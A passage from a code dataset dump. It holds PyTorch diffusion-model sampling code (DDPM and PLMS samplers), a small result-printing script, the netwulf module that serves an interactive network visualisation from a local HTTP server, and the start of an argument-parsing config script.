self.p_losses(x, c, t, *args, **kwargs)\n\n def _prior_bpd(self, x_start):\n \"\"\"\n Get the prior KL term for the variational lower-bound, measured in\n bits-per-dim.\n This term can't be optimized, as it only depends on the encoder.\n :param x_start: the [N x C x ...] tensor of inputs.\n :return: a batch of [N] KL values (in bits), one per batch element.\n \"\"\"\n batch_size = x_start.shape[0]\n t = torch.tensor([self.num_timesteps - 1] * batch_size, device=x_start.device)\n qt_mean, _, qt_log_variance = self.q_mean_variance(x_start, t)\n kl_prior = normal_kl(\n mean1=qt_mean, logvar1=qt_log_variance, mean2=0.0, logvar2=0.0\n )\n return mean_flat(kl_prior) / np.log(2.0)\n\n def p_losses(self, x_start, cond, t, noise=None):\n noise = default(noise, lambda: torch.randn_like(x_start))\n x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)\n model_output = self.model(x_noisy, t, [cond])\n\n loss_dict = {}\n prefix = \"train\" if self.training else \"val\"\n\n if self.parameterization == \"x0\":\n target = x_start\n elif self.parameterization == \"eps\":\n target = noise\n else:\n raise NotImplementedError()\n\n loss_simple = self.get_loss(model_output, target, mean=False).mean([1, 2, 3])\n loss_dict.update({f\"{prefix}/loss_simple\": loss_simple.mean()})\n\n logvar_t = self.logvar[t].to(self.device)\n loss = loss_simple / torch.exp(logvar_t) + logvar_t\n # loss = loss_simple / torch.exp(self.logvar) + self.logvar\n if self.learn_logvar:\n loss_dict.update({f\"{prefix}/loss_gamma\": loss.mean()})\n loss_dict.update({\"logvar\": self.logvar.data.mean()})\n\n loss = self.l_simple_weight * loss.mean()\n\n loss_vlb = self.get_loss(model_output, target, mean=False).mean(dim=(1, 2, 3))\n loss_vlb = (self.lvlb_weights[t] * loss_vlb).mean()\n loss_dict.update({f\"{prefix}/loss_vlb\": loss_vlb})\n loss += self.original_elbo_weight * loss_vlb\n loss_dict.update({f\"{prefix}/loss\": loss})\n\n return loss, loss_dict\n\n def p_mean_variance(\n self,\n x,\n c,\n t,\n clip_denoised: bool,\n quantize_denoised=False,\n return_x0=False,\n score_corrector=None,\n corrector_kwargs=None,\n ):\n t_in = t\n model_out = self.model(x, 
t_in, c)[0]\n\n if score_corrector is not None:\n assert self.parameterization == \"eps\"\n model_out = score_corrector.modify_score(\n self, model_out, x, t, c, **corrector_kwargs\n )\n\n if self.parameterization == \"eps\":\n x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)\n elif self.parameterization == \"x0\":\n x_recon = model_out\n else:\n raise NotImplementedError()\n\n if clip_denoised:\n x_recon.clamp_(-1.0, 1.0)\n if quantize_denoised:\n x_recon, _, [_, _, indices] = self.first_stage_model.quantize(x_recon)\n model_mean, posterior_variance, posterior_log_variance = self.q_posterior(\n x_start=x_recon, x_t=x, t=t\n )\n if return_x0:\n return model_mean, posterior_variance, posterior_log_variance, x_recon\n else:\n return model_mean, posterior_variance, posterior_log_variance\n\n @torch.no_grad()\n def p_sample(\n self,\n x,\n c,\n t,\n clip_denoised=False,\n repeat_noise=False,\n quantize_denoised=False,\n return_x0=False,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n ):\n b, *_, device = *x.shape, x.device\n outputs = self.p_mean_variance(\n x=x,\n c=c,\n t=t,\n clip_denoised=clip_denoised,\n quantize_denoised=quantize_denoised,\n return_x0=return_x0,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n )\n if return_x0:\n model_mean, _, model_log_variance, x0 = outputs\n else:\n model_mean, _, model_log_variance = outputs\n\n noise = noise_like(x.shape, device, repeat_noise) * temperature\n if noise_dropout > 0.0:\n noise = torch.nn.functional.dropout(noise, p=noise_dropout)\n # no noise when t == 0\n nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))\n\n if return_x0:\n return (\n model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise,\n x0,\n )\n else:\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n @torch.no_grad()\n def progressive_denoising(\n self,\n cond,\n shape,\n callback=None,\n quantize_denoised=False,\n img_callback=None,\n mask=None,\n x0=None,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n batch_size=None,\n x_T=None,\n start_T=None,\n log_every_t=None,\n ):\n if not log_every_t:\n log_every_t = self.log_every_t\n timesteps = self.num_timesteps\n if batch_size is not None:\n b = batch_size if batch_size is not None else shape[0]\n shape = [batch_size] + list(shape)\n else:\n b = batch_size = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=self.device)\n else:\n img = x_T\n intermediates = []\n if cond is not None:\n if isinstance(cond, dict):\n cond = {\n key: cond[key][:batch_size]\n if not isinstance(cond[key], list)\n else list(map(lambda x: x[:batch_size], cond[key]))\n for key in cond\n }\n else:\n cond = (\n [c[:batch_size] for c in cond]\n if isinstance(cond, list)\n else cond[:batch_size]\n )\n\n if start_T is not None:\n timesteps = min(timesteps, start_T)\n iterator = tqdm(\n reversed(range(0, timesteps)),\n desc=\"Progressive Generation\",\n total=timesteps,\n )\n if type(temperature) == float:\n temperature = [temperature] * timesteps\n\n for i in iterator:\n ts = torch.full((b,), i, device=self.device, dtype=torch.long)\n if self.shorten_cond_schedule:\n assert self.model.conditioning_key != \"hybrid\"\n tc = self.cond_ids[ts].to(cond.device)\n cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))\n\n img, x0_partial = self.p_sample(\n img,\n cond,\n ts,\n clip_denoised=self.clip_denoised,\n 
quantize_denoised=quantize_denoised,\n return_x0=True,\n temperature=temperature[i],\n noise_dropout=noise_dropout,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n )\n if mask is not None:\n assert x0 is not None\n img_orig = self.q_sample(x0, ts)\n img = img_orig * mask + (1.0 - mask) * img\n\n if i % log_every_t == 0 or i == timesteps - 1:\n intermediates.append(x0_partial)\n if callback:\n callback(i)\n if img_callback:\n img_callback(img, i)\n return img, intermediates\n\n @torch.no_grad()\n def p_sample_loop(\n self,\n cond,\n shape,\n return_intermediates=False,\n x_T=None,\n callback=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n img_callback=None,\n start_T=None,\n log_every_t=None,\n ):\n\n if not log_every_t:\n log_every_t = self.log_every_t\n device = self.betas.device\n b = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=device)\n else:\n img = x_T\n\n intermediates = [img]\n if timesteps is None:\n timesteps = self.num_timesteps\n\n if start_T is not None:\n timesteps = min(timesteps, start_T)\n iterator = tqdm(\n reversed(range(0, timesteps)), desc=\"Sampling t\", total=timesteps\n )\n\n if mask is not None:\n assert x0 is not None\n assert x0.shape[2:3] == mask.shape[2:3] # spatial size has to match\n\n for i in iterator:\n ts = torch.full((b,), i, device=device, dtype=torch.long)\n if self.shorten_cond_schedule:\n assert self.model.conditioning_key != \"hybrid\"\n tc = self.cond_ids[ts].to(cond.device)\n cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))\n\n img = self.p_sample(\n img,\n cond,\n ts,\n clip_denoised=self.clip_denoised,\n quantize_denoised=quantize_denoised,\n )\n if mask is not None:\n img_orig = self.q_sample(x0, ts)\n img = img_orig * mask + (1.0 - mask) * img\n\n if i % log_every_t == 0 or i == timesteps - 1:\n intermediates.append(img)\n if callback:\n callback(i)\n if img_callback:\n img_callback(img, i)\n\n if return_intermediates:\n return img, intermediates\n return img\n\n @torch.no_grad()\n def sample(\n self,\n cond,\n batch_size=16,\n return_intermediates=False,\n x_T=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n shape=None,\n **kwargs,\n ):\n if shape is None:\n shape = (batch_size, self.channels, self.image_size, self.image_size)\n if cond is not None:\n if isinstance(cond, dict):\n cond = {\n key: cond[key][:batch_size]\n if not isinstance(cond[key], list)\n else list(map(lambda x: x[:batch_size], cond[key]))\n for key in cond\n }\n else:\n cond = (\n [c[:batch_size] for c in cond]\n if isinstance(cond, list)\n else cond[:batch_size]\n )\n return self.p_sample_loop(\n cond,\n shape,\n return_intermediates=return_intermediates,\n x_T=x_T,\n timesteps=timesteps,\n quantize_denoised=quantize_denoised,\n mask=mask,\n x0=x0,\n )\n\n @torch.no_grad()\n def to_rgb(self, x):\n x = x.float()\n if not hasattr(self, \"colorize\"):\n self.colorize = torch.randn(3, x.shape[1], 1, 1).to(x)\n x = nn.functional.conv2d(x, weight=self.colorize)\n x = 2.0 * (x - x.min()) / (x.max() - x.min()) - 1.0\n return x\n\n\nclass DiffusionWrapper(nn.Module):\n def __init__(self):\n super().__init__()\n self.diffusion_model = UNetModel()\n\n def forward(self, x, t, cond: list = None):\n out = self.diffusion_model(x, t, cond)\n return out\n\n\nclass PLMSSampler(object):\n def __init__(self, model, schedule=\"linear\", **kwargs):\n super().__init__()\n self.model = model\n self.ddpm_num_timesteps = model.num_timesteps\n self.schedule = schedule\n\n def 
register_buffer(self, name, attr):\n if type(attr) == torch.Tensor:\n if attr.device != torch.device(\"cuda\"):\n attr = attr.to(torch.device(\"cuda\"))\n setattr(self, name, attr)\n\n def make_schedule(self, ddim_num_steps, ddim_discretize=\"uniform\", ddim_eta=0.0):\n if ddim_eta != 0:\n raise ValueError(\"ddim_eta must be 0 for PLMS\")\n self.ddim_timesteps = make_ddim_timesteps(\n ddim_discr_method=ddim_discretize,\n num_ddim_timesteps=ddim_num_steps,\n num_ddpm_timesteps=self.ddpm_num_timesteps,\n )\n alphas_cumprod = self.model.alphas_cumprod\n assert (\n alphas_cumprod.shape[0] == self.ddpm_num_timesteps\n ), \"alphas have to be defined for each timestep\"\n to_torch = lambda x: x.clone().detach().to(torch.float32).to(self.model.device)\n\n self.register_buffer(\"betas\", to_torch(self.model.betas))\n self.register_buffer(\"alphas_cumprod\", to_torch(alphas_cumprod))\n self.register_buffer(\n \"alphas_cumprod_prev\", to_torch(self.model.alphas_cumprod_prev)\n )\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer(\n \"sqrt_alphas_cumprod\", to_torch(np.sqrt(alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_one_minus_alphas_cumprod\",\n to_torch(np.sqrt(1.0 - alphas_cumprod.cpu())),\n )\n self.register_buffer(\n \"log_one_minus_alphas_cumprod\", to_torch(np.log(1.0 - alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_recip_alphas_cumprod\", to_torch(np.sqrt(1.0 / alphas_cumprod.cpu()))\n )\n self.register_buffer(\n \"sqrt_recipm1_alphas_cumprod\",\n to_torch(np.sqrt(1.0 / alphas_cumprod.cpu() - 1)),\n )\n\n # ddim sampling parameters\n ddim_sigmas, ddim_alphas, ddim_alphas_prev = make_ddim_sampling_parameters(\n alphacums=alphas_cumprod.cpu(),\n ddim_timesteps=self.ddim_timesteps,\n eta=ddim_eta,\n )\n self.register_buffer(\"ddim_sigmas\", ddim_sigmas)\n self.register_buffer(\"ddim_alphas\", ddim_alphas)\n self.register_buffer(\"ddim_alphas_prev\", ddim_alphas_prev)\n self.register_buffer(\"ddim_sqrt_one_minus_alphas\", np.sqrt(1.0 - ddim_alphas))\n sigmas_for_original_sampling_steps = ddim_eta * torch.sqrt(\n (1 - self.alphas_cumprod_prev)\n / (1 - self.alphas_cumprod)\n * (1 - self.alphas_cumprod / self.alphas_cumprod_prev)\n )\n self.register_buffer(\n \"ddim_sigmas_for_original_num_steps\", sigmas_for_original_sampling_steps\n )\n\n @torch.no_grad()\n def sample(\n self,\n S,\n batch_size,\n shape,\n conditioning=None,\n callback=None,\n normals_sequence=None,\n img_callback=None,\n quantize_x0=False,\n eta=0.0,\n mask=None,\n x0=None,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n x_T=None,\n log_every_t=100,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n ):\n if conditioning is not None:\n if isinstance(conditioning, dict):\n cbs = conditioning[list(conditioning.keys())[0]].shape[0]\n if cbs != batch_size:\n print(\n f\"Warning: Got {cbs} conditionings but batch-size is {batch_size}\"\n )\n else:\n if conditioning.shape[0] != batch_size:\n print(\n f\"Warning: Got {conditioning.shape[0]} conditionings but batch-size is {batch_size}\"\n )\n\n self.make_schedule(ddim_num_steps=S, ddim_eta=eta)\n # sampling\n C, H, W = shape\n size = (batch_size, C, H, W)\n print(f\"Data shape for PLMS sampling is {size}\")\n\n samples, intermediates = self.plms_sampling(\n conditioning,\n size,\n callback=callback,\n img_callback=img_callback,\n quantize_denoised=quantize_x0,\n mask=mask,\n x0=x0,\n ddim_use_original_steps=False,\n noise_dropout=noise_dropout,\n 
temperature=temperature,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n x_T=x_T,\n log_every_t=log_every_t,\n unconditional_guidance_scale=unconditional_guidance_scale,\n unconditional_conditioning=unconditional_conditioning,\n )\n return samples, intermediates\n\n @torch.no_grad()\n def plms_sampling(\n self,\n cond,\n shape,\n x_T=None,\n ddim_use_original_steps=False,\n callback=None,\n timesteps=None,\n quantize_denoised=False,\n mask=None,\n x0=None,\n img_callback=None,\n log_every_t=100,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n ):\n device = self.model.betas.device\n b = shape[0]\n if x_T is None:\n img = torch.randn(shape, device=device)\n else:\n img = x_T\n\n if timesteps is None:\n timesteps = (\n self.ddpm_num_timesteps\n if ddim_use_original_steps\n else self.ddim_timesteps\n )\n elif timesteps is not None and not ddim_use_original_steps:\n subset_end = (\n int(\n min(timesteps / self.ddim_timesteps.shape[0], 1)\n * self.ddim_timesteps.shape[0]\n )\n - 1\n )\n timesteps = self.ddim_timesteps[:subset_end]\n\n intermediates = {\"x_inter\": [img], \"pred_x0\": [img]}\n time_range = (\n list(reversed(range(0, timesteps)))\n if ddim_use_original_steps\n else np.flip(timesteps)\n )\n total_steps = timesteps if ddim_use_original_steps else timesteps.shape[0]\n print(f\"Running PLMS Sampling with {total_steps} timesteps\")\n\n iterator = tqdm(time_range, desc=\"PLMS Sampler\", total=total_steps)\n old_eps = []\n\n for i, step in enumerate(iterator):\n index = total_steps - i - 1\n ts = torch.full((b,), step, device=device, dtype=torch.long)\n ts_next = torch.full(\n (b,),\n time_range[min(i + 1, len(time_range) - 1)],\n device=device,\n dtype=torch.long,\n )\n\n if mask is not None:\n assert x0 is not None\n img_orig = self.model.q_sample(\n x0, ts\n ) # TODO: deterministic forward pass?\n img = img_orig * mask + (1.0 - mask) * img\n\n outs = self.p_sample_plms(\n img,\n cond,\n ts,\n index=index,\n use_original_steps=ddim_use_original_steps,\n quantize_denoised=quantize_denoised,\n temperature=temperature,\n noise_dropout=noise_dropout,\n score_corrector=score_corrector,\n corrector_kwargs=corrector_kwargs,\n unconditional_guidance_scale=unconditional_guidance_scale,\n unconditional_conditioning=unconditional_conditioning,\n old_eps=old_eps,\n t_next=ts_next,\n )\n img, pred_x0, e_t = outs\n old_eps.append(e_t)\n if len(old_eps) >= 4:\n old_eps.pop(0)\n if callback:\n callback(i)\n if img_callback:\n img_callback(pred_x0, i)\n\n if index % log_every_t == 0 or index == total_steps - 1:\n intermediates[\"x_inter\"].append(img)\n intermediates[\"pred_x0\"].append(pred_x0)\n\n return img, intermediates\n\n @torch.no_grad()\n def p_sample_plms(\n self,\n x,\n c,\n t,\n index,\n repeat_noise=False,\n use_original_steps=False,\n quantize_denoised=False,\n temperature=1.0,\n noise_dropout=0.0,\n score_corrector=None,\n corrector_kwargs=None,\n unconditional_guidance_scale=1.0,\n unconditional_conditioning=None,\n old_eps=None,\n t_next=None,\n ):\n b, *_, device = *x.shape, x.device\n\n def get_model_output(x, t):\n # e_t = self.model(x, t, [c])\n x_in = torch.cat([x] * 2)\n t_in = torch.cat([t] * 2)\n c_in = torch.cat([unconditional_conditioning, c])\n e_t_uncond, e_t = self.model.model(x_in, t_in, [c_in]).chunk(2)\n e_t = e_t_uncond + unconditional_guidance_scale * (e_t - e_t_uncond)\n\n if score_corrector is not None:\n assert 
self.model.parameterization == \"eps\"\n e_t = score_corrector.modify_score(\n self.model, e_t, x, t, c, **corrector_kwargs\n )\n\n return e_t\n\n alphas = self.model.alphas_cumprod if use_original_steps else self.ddim_alphas\n alphas_prev = (\n self.model.alphas_cumprod_prev\n if use_original_steps\n else self.ddim_alphas_prev\n )\n sqrt_one_minus_alphas = (\n self.model.sqrt_one_minus_alphas_cumprod\n if use_original_steps\n else self.ddim_sqrt_one_minus_alphas\n )\n sigmas = (\n self.model.ddim_sigmas_for_original_num_steps\n if use_original_steps\n else self.ddim_sigmas\n )\n\n def get_x_prev_and_pred_x0(e_t, index):\n # select parameters corresponding to the currently considered timestep\n a_t = torch.full((b, 1, 1, 1), alphas[index], device=device)\n a_prev = torch.full((b, 1, 1, 1), alphas_prev[index], device=device)\n sigma_t = torch.full((b, 1, 1, 1), sigmas[index], device=device)\n sqrt_one_minus_at = torch.full(\n (b, 1, 1, 1), sqrt_one_minus_alphas[index], device=device\n )\n\n # current prediction for x_0\n pred_x0 = (x - sqrt_one_minus_at * e_t) / a_t.sqrt()\n if quantize_denoised:\n pred_x0, _, *_ = self.model.first_stage_model.quantize(pred_x0)\n # direction pointing to x_t\n dir_xt = (1.0 - a_prev - sigma_t**2).sqrt() * e_t\n noise = sigma_t * noise_like(x.shape, device, repeat_noise) * temperature\n if noise_dropout > 0.0:\n noise = torch.nn.functional.dropout(noise, p=noise_dropout)\n x_prev = a_prev.sqrt() * pred_x0 + dir_xt + noise\n return x_prev, pred_x0\n\n e_t = get_model_output(x, t)\n if len(old_eps) == 0:\n # Pseudo Improved Euler (2nd order)\n x_prev, pred_x0 = get_x_prev_and_pred_x0(e_t, index)\n e_t_next = get_model_output(x_prev, t_next)\n e_t_prime = (e_t + e_t_next) / 2\n elif len(old_eps) == 1:\n # 2nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (3 * e_t - old_eps[-1]) / 2\n elif len(old_eps) == 2:\n # 3nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (23 * e_t - 16 * old_eps[-1] + 5 * old_eps[-2]) / 12\n elif len(old_eps) >= 3:\n # 4nd order Pseudo Linear Multistep (Adams-Bashforth)\n e_t_prime = (\n 55 * e_t - 59 * old_eps[-1] + 37 * old_eps[-2] - 9 * old_eps[-3]\n ) / 24\n\n x_prev, pred_x0 = get_x_prev_and_pred_x0(e_t_prime, index)\n\n return x_prev, pred_x0, e_t\n","repo_name":"limiteinductive/tidy-stable-diffusion","sub_path":"tsd/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":47277,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"10199781931","text":"import orchest\nfrom deep_autoviml import print_classification_model_stats, print_regression_model_stats\n\n## just collect the results from various predictions of models\ndata1 = orchest.get_inputs()\n\n### print the results one by one ####\nfor name, value in data1.items():\n if name != \"unnamed\":\n modelname = name.split(\" \")[:-1]\n modeltype = name.split(\" \")[-1]\n print(f\"\\n{modelname} \")\n y_test, y_preds = value\n if modeltype == 'Regression':\n print_regression_model_stats(y_test, y_preds)\n else:\n print_classification_model_stats(y_test, y_preds)","repo_name":"rsesha/deep_autoviml_pipeline","sub_path":"display_results.py","file_name":"display_results.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"14072615406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module provides the necessary functions to start up a local\nHTTP server and open an interactive 
d3-visualization of a network.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport simplejson as json\nfrom distutils.dir_util import copy_tree\nimport base64\nimport http.server\nimport webbrowser\nimport time\nimport threading\nfrom copy import deepcopy\nimport shutil\nfrom io import BytesIO\nimport pathlib\n\nimport numpy\n\nimport networkx as nx\nimport netwulf as wulf\n\nnetwulf_user_folder = pathlib.Path('~/.netwulf/').expanduser()\nhtml_source_path = (pathlib.Path(wulf.__path__[0]) / 'js').expanduser()\n\ndef _json_default(o):\n if isinstance(o, numpy.int64): return int(o)\n elif isinstance(o, numpy.float64): return float(o)\n raise TypeError\n\ndef mkdirp_customdir(directory=None):\n \"\"\"simulate `mkdir -p` functionality\"\"\"\n if directory is None:\n directory = netwulf_user_folder\n\n try:\n directory = pathlib.Path(directory).expanduser().resolve()\n except FileNotFoundError as e:\n directory = pathlib.Path(directory).expanduser() # Python 3.5 compliant\n\n directory.mkdir(parents=True, exist_ok=True)\n\ndef prepare_visualization_directory():\n \"\"\"Move all files from the netwulf/js directory to ~/.netwulf\"\"\"\n src = html_source_path\n dst = netwulf_user_folder\n\n # always copy source files to the subdirectory\n copy_tree(str(src), str(dst))\n\nclass NetwulfHTTPServer(http.server.HTTPServer):\n \"\"\"Custom netwulf server class adapted from \n https://stackoverflow.com/questions/268629/how-to-stop-basehttpserver-serve-forever-in-a-basehttprequesthandler-subclass \"\"\"\n\n # The handler will write in this attribute\n posted_network_properties = None\n posted_config = None\n posted_image_base64 = None\n \n end_requested = False\n\n def __init__(self, server_address, handler, subjson, verbose=False):\n http.server.HTTPServer.__init__(self, server_address, handler)\n self.subjson = subjson\n self.verbose = verbose\n\n def run(self):\n try:\n self.serve_forever()\n except OSError:\n pass\n\n def serve_forever(self):\n \"\"\"Handle one request at a time until doomsday.\"\"\"\n while not self.end_requested:\n self.handle_request()\n if self.verbose:\n print(\"serve_forever() terminated\")\n\n def stop_this(self):\n # Clean-up server (close socket, etc.)\n if self.verbose:\n print('was asked to stop the server')\n self.server_close()\n\n # try:\n for f in self.subjson:\n fPath = pathlib.Path(f)\n if fPath.exists():\n fPath.unlink()\n\n if self.verbose:\n print('deleted all files')\n\n\nclass NetwulfHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"A custom handler class adapted from\n https://stackoverflow.com/questions/6204029/extending-basehttprequesthandler-getting-the-posted-data\n and\n https://blog.anvileight.com/posts/simple-python-http-server/#do-post\n \"\"\"\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n\n # an empty POST means the server should be stopped\n if content_length == 0:\n try:\n body = self.rfile.read(content_length)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'Closing now.')\n self.wfile.write(response.getvalue())\n except: #this should actually catch a ConnectionError for windows or firefox\n pass\n self.server.end_requested = True\n else:\n body = self.rfile.read(content_length)\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n response.write(b'Successful POST request.')\n self.wfile.write(response.getvalue())\n\n # Save this posted data to the server object so it can be retrieved later on\n if 
self.server.verbose:\n print(\"Successfully posted network data to Python!\")\n received_data = json.loads(body)\n self.server.posted_network_properties = received_data['network']\n self.server.posted_config = received_data['config']\n img = received_data['image'].split(',')[1]\n self.server.posted_image_base64 = base64.decodebytes(img.encode())\n\n\n def log_message(self, format, *args):\n if self.server.verbose:\n print(self.address_string(), self.log_date_time_string(), *args)\n\n\n\ndefault_config = {\n # Input/output\n 'zoom': 1,\n # Physics\n 'node_charge': -45,\n 'node_gravity': 0.1,\n 'link_distance': 15,\n 'link_distance_variation': 0,\n 'node_collision': True,\n 'wiggle_nodes': False,\n 'freeze_nodes': False,\n # Nodes\n 'node_fill_color': '#79aaa0',\n 'node_stroke_color': '#555555',\n 'node_label_color': '#000000',\n 'display_node_labels': False,\n 'scale_node_size_by_strength': False,\n 'node_size': 5,\n 'node_stroke_width': 1,\n 'node_size_variation': 0.5,\n # Links\n 'link_color': '#7c7c7c',\n 'link_width': 2,\n 'link_alpha': 0.5,\n 'link_width_variation': 0.5,\n # Thresholding\n 'display_singleton_nodes': True,\n 'min_link_weight_percentile': 0,\n 'max_link_weight_percentile': 1\n}\n\n\ndef visualize(network,\n port=9853,\n verbose=False,\n config=None,\n plot_in_cell_below=True,\n is_test=False,\n ):\n \"\"\"\n Visualize a network interactively using Ulf Aslak's d3 web app.\n Saves the network as json, saves the passed config and runs \n a local HTTP server which then runs the web app.\n \n Parameters\n ----------\n network : networkx.Graph or networkx.DiGraph or node-link dictionary\n The network to visualize\n port : int, default : 9853\n The port at which to run the server locally.\n verbose : bool, default : False\n Be chatty.\n config : dict, default : None,\n In the default configuration, each key-value-pair will\n be overwritten with the key-value-pair provided in `config`.\n The default configuration is\n\n .. code:: python\n\n default_config = {\n # Input/output\n 'zoom': 1,\n # Physics\n 'node_charge': -45,\n 'node_gravity': 0.1,\n 'link_distance': 15,\n 'link_distance_variation': 0,\n 'node_collision': True,\n 'wiggle_nodes': False,\n 'freeze_nodes': False,\n # Nodes\n 'node_fill_color': '#79aaa0',\n 'node_stroke_color': '#555555',\n 'node_label_color': '#000000',\n 'display_node_labels': False,\n 'scale_node_size_by_strength': False,\n 'node_size': 5,\n 'node_stroke_width': 1,\n 'node_size_variation': 0.5,\n # Links\n 'link_color': '#7c7c7c',\n 'link_width': 2,\n 'link_alpha': 0.5,\n 'link_width_variation': 0.5,\n # Thresholding\n 'display_singleton_nodes': True,\n 'min_link_weight_percentile': 0,\n 'max_link_weight_percentile': 1\n }\n\n When started from a Jupyter notebook, this will show a\n reproduced matplotlib figure of the stylized network\n in a cell below. 
Only works if ``verbose = False``.\n is_test : bool, default : False\n If ``True``, the interactive environment will post\n its visualization to Python automatically after 5 seconds.\n\n Returns\n -------\n network_properties : dict\n contains all necessary information to redraw the figure which\n was created in the interactive visualization\n config : dict\n contains all configurational values of the interactive\n visualization\n \"\"\"\n\n this_config = deepcopy(default_config)\n if config is not None:\n this_config.update(config)\n\n path = netwulf_user_folder\n mkdirp_customdir()\n web_dir = pathlib.Path(path)\n\n # copy the html and js files for the visualizations\n prepare_visualization_directory()\n\n # create a json-file based on the current time\n file_id = \"tmp_{:x}\".format(int(time.time()*1000)) + \".json\"\n filename = file_id\n configname = \"config_\" + filename\n\n filepath = str(web_dir / filename)\n configpath = str(web_dir / configname)\n\n with open(filepath,'w') as f:\n if type(network) in [nx.Graph, nx.DiGraph, nx.MultiDiGraph]:\n network = nx.node_link_data(network)\n if 'graph' in network:\n network.update(network['graph'])\n del network['graph']\n json.dump(network, f, iterable_as_array=True, default=_json_default)\n elif type(network) == dict:\n json.dump(network, f, iterable_as_array=True, default=_json_default)\n else:\n raise TypeError(\"Netwulf only supports `nx.Graph`, `nx.DiGraph`, `nx.MultiDiGraph`, or `dict`.\")\n\n with open(configpath,'w') as f:\n json.dump(this_config, f, default=_json_default)\n\n # change directory to this directory\n if verbose:\n print(\"changing directory to\", str(web_dir))\n print(\"starting server here ...\", str(web_dir))\n cwd = os.getcwd()\n os.chdir(str(web_dir))\n\n server = NetwulfHTTPServer((\"127.0.0.1\", port),\n NetwulfHTTPRequestHandler,\n [filepath, configpath],\n verbose=verbose,\n )\n\n # ========= start server ============\n thread = threading.Thread(None, server.run)\n thread.start()\n\n url = \"http://localhost:\"+str(port)+\"/?data=\" + filename + \"&config=\" + configname\n if is_test:\n url += \"&pytest\"\n webbrowser.open(url)\n\n try:\n while not server.end_requested:\n time.sleep(0.1)\n is_keyboard_interrupted = False\n except KeyboardInterrupt:\n is_keyboard_interrupted = True\n \n server.end_requested = True\n\n if verbose:\n print('stopping server ...')\n server.stop_this()\n thread.join(0.2)\n\n posted_network_properties = server.posted_network_properties\n posted_config = server.posted_config\n\n if verbose:\n print('changing directory back to', cwd)\n\n os.chdir(cwd)\n \n # see whether or not the whole thing was started from a jupyter notebook and if yes,\n # actually re-draw the figure and display it\n env = os.environ\n try:\n is_jupyter = 'jupyter' in pathlib.PurePath(env['_']).name\n except: # this should actually be a key error\n # apparently this is how it has to be on Windows\n is_jupyter = 'JPY_PARENT_PID' in env\n\n if is_jupyter and plot_in_cell_below and not is_keyboard_interrupted:\n if verbose:\n print('recreating layout in matplotlib ...')\n if posted_network_properties is not None:\n fig, ax = wulf.draw_netwulf(posted_network_properties)\n\n return posted_network_properties, posted_config\n\n\nif __name__ == \"__main__\":\n # download_d3()\n G = nx.fast_gnp_random_graph(100,2/100.)\n #G = nx.barabasi_albert_graph(100,1)\n posted_data = visualize(G,config={'collision':True},verbose=True)\n #if posted_data is not None:\n # print(\"received posted data:\", 
posted_data)\n","repo_name":"benmaier/netwulf","sub_path":"netwulf/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":11578,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"54"} +{"seq_id":"8189440088","text":"import os\nimport argparse\nimport yaml\nimport shutil\nimport logging\nimport torch.utils.tensorboard as tb\n\n\ndef args_and_config():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--config\", type=str, default='cifar10.yml',\n help=\"Choose the configs file\")\n parser.add_argument(\"--verbose\", type=str, default=\"info\",\n help=\"Verbose level: info | debug | warning | critical\")\n\n parser.add_argument(\"--sample\", action=\"store_true\",\n help=\"Whether to produce samples from the model\",)\n parser.add_argument(\"--sample_speed\", type=int, default=50,\n help=\"Control the total generation step\")\n parser.add_argument(\"--sample_type\", type=str, default=\"ddim\",\n help=\"sampling approach (ddim or ddpm)\")\n parser.add_argument(\"--use_pretrained\", action=\"store_true\")\n\n parser.add_argument(\"--device\", type=str, default='cuda',\n help=\"Choose the device to use\")\n parser.add_argument(\"--restart\", action=\"store_true\",\n help=\"Restart a previous training process\")\n\n parser.add_argument(\"--exp\", type=str, default=\"exp\",\n help=\"Path for saving running related data\")\n parser.add_argument(\"--doc\", type=str, default=\"test\",\n help=\"A string for documentation purpose\")\n\n args = parser.parse_args()\n\n args.log_path = os.path.join(args.exp, \"logs\", args.doc)\n tb_path = os.path.join(args.exp, \"tensorboard\", 